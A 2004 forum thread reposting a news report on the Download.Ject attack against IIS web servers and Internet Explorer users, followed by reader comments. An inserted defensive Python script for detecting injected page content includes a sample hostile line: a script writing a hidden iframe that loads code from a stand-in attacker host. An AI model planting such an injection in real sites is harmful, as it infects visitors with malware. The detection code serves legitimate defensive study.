Posted on 06/25/2004 11:40:59 AM PDT by demlosers
Internet security organizations are warning that dozens of major Internet sites, and potentially thousands of Web sites across the Internet, are currently under attack.
Several Web administrators from major companies said their Windows-based Web servers were compromised despite being up to date on security patches, security analysts reported.
"We've been watching activity since last Sunday, but it's now hit a critical mass," says Marcus Sachs, director of the SANS Internet Storm Center, who is in communications with Homeland Security's National Cyber Security division about the attack.
The attack appears to be one of the most sophisticated Internet attacks to date. The attackers are compromising and infecting E-commerce and corporate Web sites with malicious code. That code is used to infect Web surfers using certain versions of Internet Explorer.
Security experts say Web surfers visiting these sites are at risk of having their machines infected with Trojan horse applications, used to hijack computers, as well as keystroke loggers, which are capable of stealing personal information such as financial account numbers and passwords.
It's not clear if the latest Internet Explorer patches are able to protect users' systems from becoming infected. Internet security firm Symantec's DeepSight Threat Alert says IE users are being infected through a known, but still unpatched, Internet Explorer flaw.
Symantec's BugTraq IDs for the flaws are 10472 and 10473. More information about these flaws is available at http://www.securityfocus.com/bid/10472 and http://www.securityfocus.com/bid/10473.
Security experts have been studying the attack and are unclear about the motive behind it. Some say the attacks can be traced to a Russian Web IP address of known spammers; others say the attack is designed to steal consumers' financial information.
Daniel J. Frasnelli, manager of the technical assistance center for managed security services provider NetSec, says it started monitoring the attack activity early Thursday and immediately notified its security customers.
NetSec wouldn't disclose the names of the E-commerce sites under attack, citing legal fears, but Frasnelli said infected sites include a major auction site, an auto-pricing site, and search-engine sites. "We all know these sites," he says.
Security researchers say it's not yet clear how the attackers have compromised these Web sites. "It'll take some considerable forensic examinations," says Alfred Huger, senior director of engineering for Internet security firm Symantec.
It appears that the attackers are compromising Web servers running Microsoft's Internet Information Services, either because they aren't patched or through a newfound software vulnerability.
Web surfers who visit infected sites are infected via gif images or other Web-site objects that have malicious code attached to them, including keystroke loggers and Trojan horse applications.
"Our big concern is that there is a zero-day vulnerability in IIS," Sachs says.
Microsoft is investigating the attacks. The software vendor issued a statement saying that "at 4:00 pm PT [Thursday], Microsoft began investigating reports that some customers running unprotected versions of IIS 5.0, a component of Windows 2000 Server, were being targeted."
Microsoft and Symantec say these sites are being hit with a malicious application known as Download.Ject.
At 3 a.m. Friday, Microsoft issued a statement saying that "early indications suggest" that unpatched IIS 5.0 servers are the systems targeted in the attack. Microsoft said the servers have not been updated with the patch included in Microsoft's April security bulletin MS04-011. "Customers should ensure they have installed MS04-011 to help secure against the issues corrected by that security update," the company said.
Microsoft is also urging its customers to download and install the IE patch included with Microsoft Security Bulletin MS04-013 and that they "utilize high security settings" in Internet Explorer.
To help defend against the attack, Microsoft is urging consumers to read http://www.microsoft.com/security/incident/settings.asp. It's also asking its business customers to read http://support.microsoft.com/default.aspx?scid=kb;en-us;833633 to "minimize risk." Microsoft corporate customers that have deployed XP SP2 RC2 are not at risk from the attack, the company said.
Most major antivirus companies plan to update their antivirus software to spot systems infected with the back doors and keystroke loggers associated with this attack.
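The article says compromised servers are serving pages with malicious code attached to them, which visitors' browsers then execute. A check a Web administrator can run from outside the server is to compare what the site actually serves against a known-good copy of each page and flag any script block or trailing content that the baseline does not contain. The script below is an added example, not code from the article, Microsoft or Symantec; the two pages it inspects are constructed here for illustration (the appended block is a stand-in for injected content, not a captured sample from the attack), and the names `audit_page`, `unexpected_scripts` and `trailing_content` are this example's own.

```python
import hashlib
import re

# Constructed known-good copy of a page, as the site owner published it
# (illustrative sample for this example, not taken from the article).
BASELINE_PAGE = """<html>
<head><title>Store</title>
<script src="/js/cart.js"></script>
</head>
<body><h1>Welcome</h1></body>
</html>
"""

# Constructed copy of the same page as served by a tampered server: a
# script block has been appended after </html>. Hypothetical content,
# chosen only to show what the checks below catch.
SERVED_PAGE = BASELINE_PAGE + """<script>
document.write('<iframe src="http://attacker.invalid/x" width=0 height=0></iframe>');
</script>
"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)


def script_blocks(html):
    """Return every <script>...</script> block, whitespace-normalised
    so that formatting differences alone do not trigger an alert."""
    return [" ".join(m.group(0).split()) for m in SCRIPT_RE.finditer(html)]


def unexpected_scripts(served, baseline):
    """Script blocks present in the served page but absent from the baseline."""
    known = set(script_blocks(baseline))
    return [s for s in script_blocks(served) if s not in known]


def trailing_content(html):
    """Non-whitespace content after the closing </html> tag, or '' if none.
    Legitimate pages end at </html>; anything after it is suspicious."""
    idx = html.lower().rfind("</html>")
    if idx == -1:
        return ""
    return html[idx + len("</html>"):].strip()


def page_digest(html):
    """SHA-256 of the page text, for a cheap whole-page integrity check."""
    return hashlib.sha256(html.encode()).hexdigest()


def audit_page(served, baseline):
    """Run the three checks and return a list of human-readable findings.
    An empty list means the served page matches the baseline."""
    findings = []
    if page_digest(served) != page_digest(baseline):
        findings.append("digest mismatch")
    if trailing_content(served):
        findings.append("content after </html>")
    extra = unexpected_scripts(served, baseline)
    if extra:
        findings.append(f"{len(extra)} unexpected script block(s)")
    return findings


if __name__ == "__main__":
    for finding in audit_page(SERVED_PAGE, BASELINE_PAGE):
        print("ALERT:", finding)
    print("clean baseline:", audit_page(BASELINE_PAGE, BASELINE_PAGE))
```

The digest check alone catches any change but says nothing about what changed; the two structural checks name the kind of change (new script, content past the end of the document) so an operator can tell an injected block from a routine page edit. In practice the baseline would come from the deployment source rather than from an earlier fetch of the live site, since a fetch made after the compromise would simply bake the injected code into the baseline.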
Microsoft says unpatched IIS systems only, security guys say even unpatched systems. We'll have to wait to see who's right.
Now IE + IIS is an extremely deadly combination. Luckily for the Web, most sites aren't served by IIS 5 (BTW, 6 is much better, very Apache-like in ways). Now we just need to get people off IE to solve the other half of the problem.
At least I know I can surf safe with Firefox (recent convert from Mozilla).
Skynet?
This sucks. I guess its a weekend of downloading updates and patches.
Seems like it's only fair to bump you, given your glee whenever linux hiccups.
lol!
Is Mozilla used in conjunction with an anti-virus program better than Mailwasher to stop spam & viruses? In the past 3-4 weeks, I've been inundated with that garbage. I'm well over 1,000 spam & viruses and counting of the garbage I've been receiving.
Say. That's a really nice bike.
In the last 24 hours my firewall has blocked over 1100 intrusions and blocked 500 attempted accesses.
Sadly, I've got you beat.
I've gotten email from a lib who took offense at my Conservative comments on another site, got my email address and is bombarding me with 2,000-3,000 emails a day, including porn, refinancing, Viagra, e-universities, about.com, etc etc etc.
Fortunately, Netscape's v7.1 has a junk filter control which intercepts 95% of it, and Norton AV grabs the dozens of viruses which are seeded in amongst all the email spam.
I'd like to get him alone in a room for 60 seconds.
I have noticed that Windows zealots tend to cackle hysterically during the relatively rare occasions that a Linux exploit goes public. One thing they fail to mention, though, is that Linux exploits are usually pretty esoteric, usually discovered by an engineer somewhere before they have actually been exploited, and are generally fixed within a day or two.
Important difference. Linux hiccups. Winderz vomits on its user. The Microsoft exploit handling model is thus:
Deny. Deny. Strongly Deny. Release kludge. Continue to deny. Sue whistle-blowers. Deny. Pretend it never happened. Elapsed time: 30 days to six months.
I've noticed today that the ad agency/media providers -- like tribalfusion.com and fastclick.net -- seem to be worst affected. Would be fine with me, except it hangs up access to the referring web pages.
Yeah, I know what you mean. I visualize myself with a bazooka aimed at that spam and/or virus sender and blowing him/her to kingdom come. Think I'm going to solve some of the problem. I'm leaving town for four weeks and my ISP will be disconnecting me to try and solve the problem. That email should be bounced back real quickly with some message that the email can't be sent.
Two words, "Zone Alarm"
Have you tried complaining to this person's ISP? There is not an ISP on the planet that will tolerate that kind of behavior. And if you can't get his/her ISP's attention, your ISP certainly can since that kind of flooding has a real dollar cost associated with it. This person wouldn't find their stunt so amusing after being blackballed by ISPs.
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.